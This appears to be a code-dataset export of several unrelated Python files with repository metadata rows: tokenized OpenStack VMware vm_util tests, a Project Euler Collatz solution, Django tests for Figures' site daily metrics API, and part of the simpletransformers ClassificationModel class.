name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'prop_val'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_not_matched
dedent|''
dedent|''
name|'def'
name|'test_get_folder_child_entry_not_matched'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
string|"'fake-1-name'"
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ret'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity'
op|','
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_folder_child_entry_matched
dedent|''
dedent|''
name|'def'
name|'test_get_folder_child_entry_matched'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'child_entity'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'child_entity'
op|'.'
name|'_type'
op|'='
string|"'Folder'"
newline|'\n'
name|'prop_val'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'prop_val'
op|'.'
name|'ManagedObjectReference'
op|'='
op|'['
name|'child_entity'
op|']'
newline|'\n'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
op|'['
name|'prop_val'
op|','
string|"'fake-name'"
op|']'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'_get_folder'
op|'('
name|'session'
op|','
string|"'fake-parent'"
op|','
string|"'fake-name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ret'
op|','
name|'child_entity'
op|')'
newline|'\n'
name|'expected_invoke_api'
op|'='
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake-parent'"
op|','
nl|'\n'
string|"'childEntity'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
name|'vutil'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
name|'child_entity'
op|','
string|"'name'"
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected_invoke_api'
op|','
nl|'\n'
name|'session'
op|'.'
name|'_call_method'
op|'.'
name|'mock_calls'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_folder_path_ref_cache
dedent|''
dedent|''
name|'def'
name|'test_folder_path_ref_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'path'
op|'='
string|"'OpenStack/Project (e2b86092bf064181ade43deb3188f8e4)'"
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'vm_util'
op|'.'
name|'folder_ref_cache_get'
op|'('
name|'path'
op|')'
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'folder_ref_cache_update'
op|'('
name|'path'
op|','
string|"'fake-ref'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-ref'"
op|','
name|'vm_util'
op|'.'
name|'folder_ref_cache_get'
op|'('
name|'path'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_name
dedent|''
name|'def'
name|'test_get_vm_name'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
name|'expected'
op|'='
name|'uuid'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'None'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
nl|'\n'
name|'display_name'
op|'='
string|"'fira'"
newline|'\n'
name|'expected'
op|'='
string|"'fira (%s)'"
op|'%'
name|'uuid'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'display_name'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
nl|'\n'
name|'display_name'
op|'='
string|"'X'"
op|'*'
number|'255'
newline|'\n'
name|'expected'
op|'='
string|"'%s (%s)'"
op|'%'
op|'('
string|"'X'"
op|'*'
number|'41'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'name'
op|'='
name|'vm_util'
op|'.'
name|'_get_vm_name'
op|'('
name|'display_name'
op|','
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'name'
op|')'
op|','
number|'80'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'_get_vm_name'"
op|','
name|'return_value'
op|'='
string|"'fake-name'"
op|')'
newline|'\n'
DECL|member|test_rename_vm
name|'def'
name|'test_rename_vm'
op|'('
name|'self'
op|','
name|'mock_get_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake_rename_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_call_method'
op|','
name|'_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'rename_vm'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|"'Rename_Task'"
op|','
string|"'fake-ref'"
op|','
name|'newName'
op|'='
string|"'fake-name'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
string|"'fake_rename_task'"
op|')'
newline|'\n'
dedent|''
name|'mock_get_name'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'display_name'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'driver'
op|'.'
name|'VMwareAPISession'
op|','
string|"'vim'"
op|','
name|'stubs'
op|'.'
name|'fake_vim_prop'
op|')'
newline|'\n'
DECL|class|VMwareVMUtilGetHostRefTestCase
name|'class'
name|'VMwareVMUtilGetHostRefTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
comment|'# N.B. Mocking on the class only mocks test_*(), but we need'
nl|'\n'
comment|'# VMwareAPISession.vim to be mocked in both setUp and tests. Not mocking in'
nl|'\n'
comment|'# setUp causes object initialisation to fail. Not mocking in tests results'
nl|'\n'
comment|'# in vim calls not using FakeVim.'
nl|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'driver'
op|'.'
name|'VMwareAPISession'
op|','
string|"'vim'"
op|','
name|'stubs'
op|'.'
name|'fake_vim_prop'
op|')'
newline|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVMUtilGetHostRefTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'vm_refs_cache_reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'driver'
op|'.'
name|'VMwareAPISession'
op|'('
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a fake VirtualMachine running on a known host'
nl|'\n'
name|'self'
op|'.'
name|'host_ref'
op|'='
name|'list'
op|'('
name|'fake'
op|'.'
name|'_db_content'
op|'['
string|"'HostSystem'"
op|']'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'vm_ref'
op|'='
name|'fake'
op|'.'
name|'create_vm'
op|'('
name|'host_ref'
op|'='
name|'self'
op|'.'
name|'host_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_vm_ref'"
op|')'
newline|'\n'
DECL|member|test_get_host_ref_for_vm
name|'def'
name|'test_get_host_ref_for_vm'
op|'('
name|'self'
op|','
name|'mock_get_vm_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_get_vm_ref'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'vm_ref'
newline|'\n'
nl|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'get_host_ref_for_vm'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
nl|'\n'
name|'mock_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'host_ref'
op|','
name|'ret'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|"'get_vm_ref'"
op|')'
newline|'\n'
DECL|member|test_get_host_name_for_vm
name|'def'
name|'test_get_host_name_for_vm'
op|'('
name|'self'
op|','
name|'mock_get_vm_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_get_vm_ref'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'vm_ref'
newline|'\n'
nl|'\n'
name|'host'
op|'='
name|'fake'
op|'.'
name|'_get_object'
op|'('
name|'self'
op|'.'
name|'host_ref'
op|')'
newline|'\n'
nl|'\n'
name|'ret'
op|'='
name|'vm_util'
op|'.'
name|'get_host_name_for_vm'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
nl|'\n'
name|'mock_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-instance'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'host'
op|'.'
name|'name'
op|','
name|'ret'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.746808 | 111 | 0.62103 |
92f38a48ab4c0bf634d58e7bddae67b332b65bca | 266 | py | Python | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 67 | 2017-12-05T20:44:33.000Z | 2022-03-04T08:13:16.000Z | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 49 | 2018-03-26T14:20:26.000Z | 2021-08-17T09:08:55.000Z | src/014/p014.py | Ernulphus/polyglot-euler | a5b59b08e6844f0c278bff5ab798acefa95749f3 | [
"MIT"
] | 17 | 2018-03-25T23:40:47.000Z | 2022-03-04T08:13:44.000Z | def collatz(n):
seq = [n]
while n > 1:
if n % 2 == 0:
n = n / 2
else:
n = 3 * n + 1
seq.append(int(n))
return seq
# Project Euler 14: report the starting number below one million that
# produces the longest Collatz chain (1-based, first occurrence on ties).
chain_lengths = [len(collatz(start)) for start in range(1, int(1e6))]
print(chain_lengths.index(max(chain_lengths)) + 1)
| 17.733333 | 53 | 0.443609 |
c117f17480d1bc6e45e99b4815a02b06aed9ec7f | 5,520 | py | Python | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 43 | 2018-05-29T20:01:25.000Z | 2021-12-02T09:43:17.000Z | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 330 | 2018-05-30T17:06:15.000Z | 2022-03-16T15:52:22.000Z | tests/views/test_site_daily_metrics_view.py | groovetch/edx-figures | a69fc1195c05176ac7dae90b337dd77f4bd9679f | [
"MIT"
] | 40 | 2018-10-06T00:15:58.000Z | 2022-02-14T12:44:45.000Z | '''Tests Figures SiteDailyMetricsViewSet class
'''
from __future__ import absolute_import
import datetime
from dateutil.parser import parse
from dateutil.rrule import rrule, DAILY
import pytest
from django.contrib.auth import get_user_model
from rest_framework.test import (
APIRequestFactory,
# RequestsClient, Not supported in older rest_framework versions
force_authenticate,
)
from figures.models import SiteDailyMetrics
from figures.pagination import FiguresLimitOffsetPagination
from figures.views import SiteDailyMetricsViewSet
from figures.serializers import SiteSerializer
from tests.factories import SiteDailyMetricsFactory, UserFactory
from tests.views.base import BaseViewTest
from tests.helpers import django_filters_pre_v2
# NOTE(review): not referenced anywhere else in this module — presumably a
# placeholder for future table-driven tests; confirm before removing.
TEST_DATA = [
    {}
]
def generate_sdm_series(site, first_day, last_day):
    """Create one SiteDailyMetrics record per day, from first_day through last_day inclusive."""
    records = []
    for day in rrule(DAILY, dtstart=first_day, until=last_day):
        records.append(SiteDailyMetricsFactory(site=site, date_for=day))
    return records
@pytest.mark.django_db
class TestSiteDailyMetricsView(BaseViewTest):
    '''Integration tests for the SiteDailyMetricsViewSet list/create endpoints.

    Note: This test class duplicates some of the code in
    test_serializers.TestSiteDailyMetricsSerializer
    We might want to do the date handling/comparing code as a mix-in
    TODO: After we finish and commit the view test for this, set the serialization
    type for the dates. This should simplify this a lot
    # http://www.django-rest-framework.org/api-guide/fields/#date-and-time-fields
    '''
    # URL path used to build test requests, and the viewset under test.
    request_path = 'api/site-daily-metrics'
    view_class = SiteDailyMetricsViewSet
    @pytest.fixture(autouse=True)
    def setup(self, db):
        # Seed one SiteDailyMetrics record per day for 2018-01-01..2018-03-31.
        super(TestSiteDailyMetricsView, self).setup(db)
        self.first_day = parse('2018-01-01')
        self.last_day = parse('2018-03-31')
        # Date/datetime fields are compared separately in test_get_by_date_range,
        # since the serialized values need parsing before comparison.
        self.date_fields = set(['date_for', 'created', 'modified', ])
        self.expected_results_keys = set([o.name for o in SiteDailyMetrics._meta.fields])
        # NOTE(review): 'field_names' is built but never used — candidate for removal.
        field_names = (o.name for o in SiteDailyMetrics._meta.fields
                       if o.name not in self.date_fields)
        self.metrics = generate_sdm_series(self.site, self.first_day, self.last_day)
    def test_get_last_day(self):
        # Placeholder — not implemented yet.
        pass
    @pytest.mark.parametrize('first_day, last_day', [
        ('2018-02-01', '2018-02-28',),
    ])
    def test_get_by_date_range(self, first_day, last_day):
        '''Fetch the list endpoint filtered by a date range and verify each result.

        Note: This test is sensitive in the order data are compared. It expects
        that records are retrieved by date_for, descending.
        TODO: Add more date ranges
        '''
        # django-filter renamed range query params between v1 and v2
        # (date_0/date_1 vs date_after/date_before).
        if django_filters_pre_v2():
            endpoint = '{}?date_0={}&date_1={}'.format(
                self.request_path, first_day, last_day)
        else:
            endpoint = '{}?date_after={}&date_before={}'.format(
                self.request_path, first_day, last_day)
        # TODO Is this backward compatible?
        expected_data = SiteDailyMetrics.objects.filter(
            date_for__range=(first_day, last_day))
        factory = APIRequestFactory()
        request = factory.get(endpoint)
        force_authenticate(request, user=self.staff_user)
        view = self.view_class.as_view({'get': 'list'})
        response = view(request)
        assert response.status_code == 200
        # Expect the following format for pagination
        # {
        #     "count": 2,
        #     "next": null, # or a url
        #     "previous": null, # or a url
        #     "results": [
        #         ... # list of the results
        #     ]
        # }
        assert set(response.data.keys()) == set(
            ['count', 'next', 'previous', 'results', ])
        # Only one page is checked: the result set is capped at the default page size.
        assert len(response.data['results']) == FiguresLimitOffsetPagination.default_limit
        # Hack: Check date and datetime values explicitly
        for data in response.data['results']:
            db_rec = expected_data.get(id=data['id'])
            assert data['date_for'] == str(db_rec.date_for)
            assert parse(data['created']) == db_rec.created
            assert parse(data['modified']) == db_rec.modified
            # Remaining (non-date, non-relation) fields compare directly.
            check_fields = self.expected_results_keys - self.date_fields - set(['site'])
            for field_name in check_fields:
                assert data[field_name] == getattr(db_rec, field_name)
    @pytest.mark.xfail
    def test_create(self):
        """POST a new record; expected to fail until nested-write support exists.

        When adding the site serialized data, this test fails with:
        AssertionError: The `.create()` method does not support writable
        nested fields by default.
        Write an explicit `.create()` method for serializer
        `figures.serializers.SiteDailyMetricsSerializer`, or set `read_only=True`
        on nested serializer fields.
        Note: We don't need write functionality with this view as of version 0.2.0
        """
        data = dict(
            date_for='2020-01-01',
            cumulative_active_user_count=1,
            todays_active_user_count=2,
            total_user_count=3,
            course_count=4,
            total_enrollment_count=5,
            mau=6,
        )
        # Might not need to set format='json'
        request = APIRequestFactory().post(
            self.request_path, data, format='json')
        force_authenticate(request, user=self.staff_user)
        view = SiteDailyMetricsViewSet.as_view({'post': 'create'})
        response = view(request)
        assert response.status_code == 201
        assert 'id' in list(response.data.keys())
        # Every submitted field should round-trip unchanged in the response.
        for key in data.keys():
            assert response.data[key] == data[key]
| 36.078431 | 90 | 0.648732 |
c36f6860c89a3529a9e42691689d7f1c3941b287 | 58,001 | py | Python | simpletransformers/classification/classification_model.py | asmsuechan/simpletransformers | b6c1c72aea6b00baa40bbd5cc2510a947a9ca181 | [
"Apache-2.0"
] | 1 | 2021-04-21T02:25:30.000Z | 2021-04-21T02:25:30.000Z | simpletransformers/classification/classification_model.py | pranavnt/simpletransformers | bd4c3972e02ebf1d5258c682e5a7e8ee70b98c06 | [
"Apache-2.0"
] | null | null | null | simpletransformers/classification/classification_model.py | pranavnt/simpletransformers | bd4c3972e02ebf1d5258c682e5a7e8ee70b98c06 | [
"Apache-2.0"
] | 1 | 2020-11-05T03:39:16.000Z | 2020-11-05T03:39:16.000Z | #!/usr/bin/env python
# coding: utf-8
from __future__ import absolute_import, division, print_function
import json
import logging
import math
import os
import random
import warnings
from dataclasses import asdict
from multiprocessing import cpu_count
import numpy as np
import pandas as pd
import torch
from scipy.stats import mode, pearsonr
from sklearn.metrics import (
confusion_matrix,
label_ranking_average_precision_score,
matthews_corrcoef,
mean_squared_error,
)
from tensorboardX import SummaryWriter
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm.auto import tqdm, trange
from tqdm.contrib import tenumerate
from transformers import (
WEIGHTS_NAME,
AdamW,
AlbertConfig,
AlbertTokenizer,
BertConfig,
BertTokenizer,
CamembertConfig,
CamembertTokenizer,
DistilBertConfig,
DistilBertTokenizer,
ElectraConfig,
ElectraTokenizer,
FlaubertConfig,
FlaubertTokenizer,
LongformerConfig,
LongformerForSequenceClassification,
LongformerTokenizer,
MobileBertConfig,
MobileBertForSequenceClassification,
MobileBertTokenizer,
RobertaConfig,
RobertaTokenizer,
XLMConfig,
XLMRobertaConfig,
XLMRobertaTokenizer,
XLMTokenizer,
XLNetConfig,
XLNetTokenizer,
get_linear_schedule_with_warmup,
)
from simpletransformers.classification.classification_utils import (
InputExample,
LazyClassificationDataset,
convert_examples_to_features,
)
from simpletransformers.classification.transformer_models.albert_model import AlbertForSequenceClassification
from simpletransformers.classification.transformer_models.bert_model import BertForSequenceClassification
from simpletransformers.classification.transformer_models.camembert_model import CamembertForSequenceClassification
from simpletransformers.classification.transformer_models.distilbert_model import DistilBertForSequenceClassification
from simpletransformers.classification.transformer_models.flaubert_model import FlaubertForSequenceClassification
from simpletransformers.classification.transformer_models.roberta_model import RobertaForSequenceClassification
from simpletransformers.classification.transformer_models.xlm_model import XLMForSequenceClassification
from simpletransformers.classification.transformer_models.xlm_roberta_model import XLMRobertaForSequenceClassification
from simpletransformers.classification.transformer_models.xlnet_model import XLNetForSequenceClassification
from simpletransformers.config.global_args import global_args
from simpletransformers.config.model_args import ClassificationArgs
from simpletransformers.custom_models.models import ElectraForSequenceClassification
# wandb (Weights & Biases) is an optional dependency used for experiment
# tracking. Record whether it is importable so that wandb logging can be
# disabled gracefully later instead of crashing at runtime.
try:
    import wandb
    wandb_available = True
except ImportError:
    wandb_available = False
# Module-level logger, following the standard `logging` convention.
logger = logging.getLogger(__name__)
class ClassificationModel:
    def __init__(
        self, model_type, model_name, num_labels=None, weight=None, args=None, use_cuda=True, cuda_device=-1, **kwargs,
    ):
        """
        Initializes a ClassificationModel model.
        Args:
            model_type: The type of model (bert, xlnet, xlm, roberta, distilbert)
            model_name: The exact architecture and trained weights to use. This may be a Hugging Face Transformers compatible pre-trained model, a community model, or the path to a directory containing model files.
            num_labels (optional): The number of labels or classes in the dataset.
            weight (optional): A list of length num_labels containing the weights to assign to each label for loss calculation.
            args (optional): Default args will be used if this parameter is not provided. If provided, it should be a dict containing the args that should be changed in the default args.
            use_cuda (optional): Use GPU if available. Setting to False will force model to use CPU only.
            cuda_device (optional): Specific GPU that should be used. Will use the first available GPU by default.
            **kwargs (optional): For providing proxies, force_download, resume_download, cache_dir and other options specific to the 'from_pretrained' implementation where this will be supplied.
        """ # noqa: ignore flake8"
        # Registry mapping each supported model_type string to its
        # (config class, sequence-classification model class, tokenizer class).
        MODEL_CLASSES = {
            "albert": (AlbertConfig, AlbertForSequenceClassification, AlbertTokenizer),
            "bert": (BertConfig, BertForSequenceClassification, BertTokenizer),
            "camembert": (CamembertConfig, CamembertForSequenceClassification, CamembertTokenizer),
            "distilbert": (DistilBertConfig, DistilBertForSequenceClassification, DistilBertTokenizer),
            "electra": (ElectraConfig, ElectraForSequenceClassification, ElectraTokenizer),
            "flaubert": (FlaubertConfig, FlaubertForSequenceClassification, FlaubertTokenizer),
            "longformer": (LongformerConfig, LongformerForSequenceClassification, LongformerTokenizer),
            "mobilebert": (MobileBertConfig, MobileBertForSequenceClassification, MobileBertTokenizer),
            "roberta": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer),
            "xlnet": (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
            "xlm": (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
            "xlmroberta": (XLMRobertaConfig, XLMRobertaForSequenceClassification, XLMRobertaTokenizer),
        }
        # `args` may be a plain dict of overrides applied on top of the saved/default
        # args, or a complete ClassificationArgs object that replaces them.
        self.args = self._load_model_args(model_name)
        if isinstance(args, dict):
            self.args.update_from_dict(args)
        elif isinstance(args, ClassificationArgs):
            self.args = args
        # When running inside a wandb hyperparameter sweep, flatten the sweep
        # values (excluding wandb's internal "_wandb" key) into the args.
        if "sweep_config" in kwargs:
            sweep_config = kwargs.pop("sweep_config")
            sweep_values = {key: value["value"] for key, value in sweep_config.as_dict().items() if key != "_wandb"}
            self.args.update_from_dict(sweep_values)
        # Seed every RNG in play (Python, NumPy, torch CPU/GPU) for reproducibility.
        if self.args.manual_seed:
            random.seed(self.args.manual_seed)
            np.random.seed(self.args.manual_seed)
            torch.manual_seed(self.args.manual_seed)
            if self.args.n_gpu > 0:
                torch.cuda.manual_seed_all(self.args.manual_seed)
        # Reconcile labels_list / labels_map / num_labels. labels_map keys may have
        # been stringified by JSON round-tripping, hence the int() fallback below.
        if self.args.labels_list:
            if num_labels:
                assert num_labels == len(self.args.labels_list)
            if self.args.labels_map:
                try:
                    assert list(self.args.labels_map.keys()) == self.args.labels_list
                except AssertionError:
                    assert [int(key) for key in list(self.args.labels_map.keys())] == self.args.labels_list
                    self.args.labels_map = {int(key): value for key, value in self.args.labels_map.items()}
            else:
                self.args.labels_map = {label: i for i, label in enumerate(self.args.labels_list)}
        else:
            # No explicit labels: default to binary classification unless num_labels given.
            len_labels_list = 2 if not num_labels else num_labels
            self.args.labels_list = [i for i in range(len_labels_list)]
        config_class, model_class, tokenizer_class = MODEL_CLASSES[model_type]
        # When num_labels is omitted, fall back to whatever the pretrained config declares.
        if num_labels:
            self.config = config_class.from_pretrained(model_name, num_labels=num_labels, **self.args.config)
            self.num_labels = num_labels
        else:
            self.config = config_class.from_pretrained(model_name, **self.args.config)
            self.num_labels = self.config.num_labels
        self.weight = weight
        # Device selection: fail loudly if CUDA was requested but is unavailable,
        # rather than silently training on CPU.
        if use_cuda:
            if torch.cuda.is_available():
                if cuda_device == -1:
                    self.device = torch.device("cuda")
                else:
                    self.device = torch.device(f"cuda:{cuda_device}")
            else:
                raise ValueError(
                    "'use_cuda' set to True when cuda is unavailable."
                    " Make sure CUDA is available or set use_cuda=False."
                )
        else:
            self.device = "cpu"
        # Optional per-class loss weights are handed to the model constructor.
        if self.weight:
            self.model = model_class.from_pretrained(
                model_name, config=self.config, weight=torch.Tensor(self.weight).to(self.device), **kwargs,
            )
        else:
            self.model = model_class.from_pretrained(model_name, config=self.config, **kwargs)
        self.results = {}
        # fp16 (mixed precision) only makes sense on GPU.
        if not use_cuda:
            self.args.fp16 = False
        self.tokenizer = tokenizer_class.from_pretrained(model_name, do_lower_case=self.args.do_lower_case, **kwargs)
        self.args.model_name = model_name
        self.args.model_type = model_type
        # NOTE: these tokenizers are known to break under multiprocessing during
        # feature conversion, so multiprocessing is force-disabled for them.
        if model_type in ["camembert", "xlmroberta"]:
            warnings.warn(
                f"use_multiprocessing automatically disabled as {model_type}"
                " fails when using multiprocessing for feature conversion."
            )
            self.args.use_multiprocessing = False
        if self.args.wandb_project and not wandb_available:
            warnings.warn("wandb_project specified but wandb is not available. Wandb disabled.")
            self.args.wandb_project = None
    def train_model(
        self,
        train_df,
        multi_label=False,
        output_dir=None,
        show_running_loss=True,
        args=None,
        eval_df=None,
        verbose=True,
        **kwargs,
    ):
        """
        Trains the model using 'train_df'
        Args:
            train_df: Pandas Dataframe containing at least two columns. If the Dataframe has a header, it should contain a 'text' and a 'labels' column. If no header is present,
            the Dataframe should contain at least two columns, with the first column containing the text, and the second column containing the label. The model will be trained on this Dataframe.
            output_dir: The directory where model files will be saved. If not given, self.args.output_dir will be used.
            show_running_loss (optional): Set to False to prevent running loss from being printed to console. Defaults to True.
            args (optional): Optional changes to the args dict of the model. Any changes made will persist for the model.
            eval_df (optional): A DataFrame against which evaluation will be performed when evaluate_during_training is enabled. Is required if evaluate_during_training is enabled.
            **kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
                    A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
        Returns:
            None
        """ # noqa: ignore flake8"
        if args:
            self.args.update_from_dict(args)
